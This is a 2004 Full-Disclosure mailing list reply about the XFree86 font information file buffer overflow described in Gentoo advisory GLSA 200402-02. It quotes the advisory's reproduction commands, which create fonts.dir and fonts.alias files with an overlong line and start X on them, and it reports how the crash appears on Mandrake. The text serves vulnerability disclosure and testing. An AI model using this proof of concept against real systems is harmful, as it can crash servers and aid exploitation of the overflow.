[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow

To: <full-disclosure@lists.netsys.com>
Subject: [Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow
From: "Evert Daman" <linux@digipix.org>
Date: Thu, 12 Feb 2004 08:45:51 +0100

> To reproduce the overflow on the command line, you can run:
>
> # cat > fonts.dir <<EOF
> ~  1
> ~  word.bdf \
> ~  -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
> ~  EOF
> # perl -e 'print "0" x 1024 . "A" x 96 . "\n"' > fonts.alias
> # X :0 -fp $PWD
>
> {Some output removed}... Server aborting... Segmentation fault (core
dumped)

mandrake gives me a:

Fatal server error:
Caught signal 11.  Server aborting

no segfault or something...

kind regards,
Evert


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow
  - From: qobaiashi <qobaiashi@gmx.net>

References:
- [Full-Disclosure] [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow
  - From: Tim Yamin <plasmaroo@gentoo.org>

Prev by Date: [Full-Disclosure] [SECURITY] [DSA 437-1] New cgiemail packages fix open mail relaying
Next by Date: [Full-Disclosure] phpnuke 6.9 search module exploit.
Previous by thread: [Full-Disclosure] [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow
Next by thread: Re: [Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow
Index(es):
- Date
- Thread